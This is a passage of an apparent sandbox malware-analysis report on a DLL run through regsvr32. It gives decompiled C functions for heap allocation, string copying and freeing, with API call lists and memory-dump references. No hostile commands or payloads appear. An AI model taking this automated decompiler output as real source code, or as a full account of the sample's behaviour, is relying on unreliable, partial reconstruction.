    0x1000b0c2
    0x1000b0d2
    0x1000b0d2
    0x1000b106
    0x1000b106
    0x1000b13d

    APIs
    • wcslen.MSVCRT ref: 1000B0A5
    • HeapAlloc.KERNEL32(008B0000,00000000,0000000A), ref: 1000B0C9
    • HeapReAlloc.KERNEL32(008B0000,00000000,00000000,0000000A), ref: 1000B0ED
    • HeapFree.KERNEL32(008B0000,00000000,00000000), ref: 1000B124
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd
    C-Code - Quality: 93%
    			E1000B540(void* _a4) {
    				void* _t10;
    				void* _t16;
    				void* _t18;
    				void* _t19;
    				void* _t20;
    				void* _t21;
    				void* _t22;
    
    				_t18 = _a4;
    				_push(_t18);
    				E1000B5B0();
    				_t21 = _t20 + 4;
    				_t10 =  *( *(_t18 + 4) + 0x460);
    				if(_t10 != 0) {
    					free(_t10);
    					_t21 = _t21 + 4;
    				}
    				E1000F9A0( *((intOrPtr*)( *(_t18 + 4) + 0x3c)));
    				_t22 = _t21 + 4;
    				_t19 = 0;
    				do {
    					_t16 = E10010950( *(_t18 + 4) - 0xffffff80 + _t19);
    					_t19 = _t19 + 0xc;
    					_t22 = _t22 + 4;
    				} while (_t19 < 0x60);
    				free( *(_t18 + 4));
    				free( *_t18);
    				free(_t18);
    				return _t16;
    			}










    0x1000b543
    0x1000b547
    0x1000b548
    0x1000b550
    0x1000b559
    0x1000b561
    0x1000b564
    0x1000b566
    0x1000b566
    0x1000b56f
    0x1000b574
    0x1000b577
    0x1000b580
    0x1000b589
    0x1000b58e
    0x1000b591
    0x1000b594
    0x1000b59c
    0x1000b5a0
    0x1000b5a3
    0x1000b5ab

    APIs
      • Part of subcall function 1000B5B0: free.MSVCRT(?), ref: 1000B5FC
      • Part of subcall function 1000B5B0: free.MSVCRT(?), ref: 1000B634
      • Part of subcall function 1000B5B0: free.MSVCRT(?), ref: 1000B64E
      • Part of subcall function 1000B5B0: __p__iob.MSVCRT ref: 1000B69E
      • Part of subcall function 1000B5B0: fclose.MSVCRT ref: 1000B6A9
    • free.MSVCRT(?), ref: 1000B564
      • Part of subcall function 1000F9A0: free.MSVCRT(?,00000000,1000B9BF,?), ref: 1000F9AC
      • Part of subcall function 1000F9A0: free.MSVCRT(1000B9BF,00000000), ref: 1000F9ED
      • Part of subcall function 10010950: free.MSVCRT(?,00000000,1000B58E,?), ref: 1001095C
      • Part of subcall function 10010950: free.MSVCRT(FE8304C4,00000000,1000B58E,?), ref: 1001096D
    • free.MSVCRT(?), ref: 1000B59C
    • free.MSVCRT(?), ref: 1000B5A0
    • free.MSVCRT(?), ref: 1000B5A3
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd
    C-Code - Quality: 94%
    			E10011530(void* __eflags, void* _a4) {
    				void* _t12;
    				void* _t13;
    				void* _t14;
    				void* _t16;
    				void* _t18;
    				void* _t19;
    				void* _t20;
    
    				_t16 = _a4;
    				_t2 = _t16 + 0x170; // 0x1000b800
    				E100127E0(_t2);
    				_t20 = _t19 + 4;
    				_t3 = _t16 + 8; // 0x1000b698
    				_pop(_t17);
    				_a4 = _t3;
    				_t18 = _a4;
    				if(_t18 != 0) {
    					_t12 =  *_t18;
    					if(_t12 != 0) {
    						free(_t12);
    						_t20 = _t20 + 4;
    					}
    					_t13 =  *(_t18 + 0x10);
    					if(_t13 != 0) {
    						free(_t13);
    						_t20 = _t20 + 4;
    					}
    					_t14 =  *(_t18 + 0x14);
    					if(_t14 != 0) {
    						free(_t14);
    						_t20 = _t20 + 4;
    					}
    					memset(_t18, 0, 0x168);
    				}
    				return 0;
    			}










    0x10011531
    0x10011535
    0x1001153c
    0x10011541
    0x10011544
    0x10011547
    0x10011548
    0x100120b1
    0x100120b7
    0x100120b9
    0x100120bd
    0x100120c0
    0x100120c5
    0x100120c5
    0x100120c8
    0x100120cd
    0x100120d0
    0x100120d5
    0x100120d5
    0x100120d8
    0x100120dd
    0x100120e0
    0x100120e5
    0x100120e5
    0x100120f0
    0x100120f5
    0x100120fb

    APIs
      • Part of subcall function 100127E0: free.MSVCRT(1000B800,1000B690,10011541,1000B800,?,1000B690,?), ref: 100127F0
    • free.MSVCRT(1000B698,?), ref: 100120C0
    • free.MSVCRT(?,?), ref: 100120D0
    • free.MSVCRT(?,?), ref: 100120E0
    • memset.MSVCRT ref: 100120F0
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd
    C-Code - Quality: 100%
    			E100091F5(wchar_t* _a4) {
    				wchar_t* _t6;
    				void** _t13;
    
    				_t6 = E1000A910( *0x1002c16c);
    				_t13 = _t6;
    				if( *_t13 != 0) {
    					_t6 = HeapFree( *0x10028080, 0,  *_t13);
    					 *_t13 =  *_t13 & 0x00000000;
    				}
    				if(_a4 != 0) {
    					_t6 = HeapAlloc( *0x10028080, 0, 2 + wcslen(_a4) * 2);
    					 *_t13 = _t6;
    					if(_t6 != 0) {
    						return wcscpy(_t6, _a4);
    					}
    				}
    				return _t6;
    			}





    0x100091fc
    0x10009201
    0x10009206
    0x10009212
    0x10009218
    0x10009218
    0x10009220
    0x1000923c
    0x10009242
    0x10009246
    0x00000000
    0x10009253
    0x10009246
    0x10009255

    APIs
    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 10009212
    • wcslen.MSVCRT ref: 10009226
    • HeapAlloc.KERNEL32(00000000,00000000,00000000,10008B42,10028168,?,?,00000001,00000006,10028168,00004000,?,?,00000001,?,100086C1), ref: 1000923C
    • wcscpy.MSVCRT ref: 1000924D
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd
    C-Code - Quality: 100%
    			E10012350(void* _a4, intOrPtr _a8) {
    				signed int _t8;
    				void* _t16;
    
    				_t16 = _a4;
    				if(_t16 == 0) {
    					return _t8 | 0xffffffff;
    				} else {
    					memset(_t16, 0, 0x168);
    					 *(_t16 + 4) = 0x4000;
    					 *_t16 = malloc(0x4000);
    					 *((intOrPtr*)(_t16 + 0x18)) = 0x400;
    					 *((intOrPtr*)(_t16 + 0x10)) = malloc(0x1000);
    					 *((intOrPtr*)(_t16 + 0x14)) = malloc(0x2000);
    					 *((intOrPtr*)(_t16 + 0x150)) = _a8;
    					return 0;
    				}
    			}





    0x10012351
    0x10012357
    0x100123af
    0x10012359
    0x10012361
    0x1001236b
    0x1001237c
    0x1001237e
    0x1001238f
    0x1001239a
    0x100123a1
    0x100123aa
    0x100123aa

    APIs
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd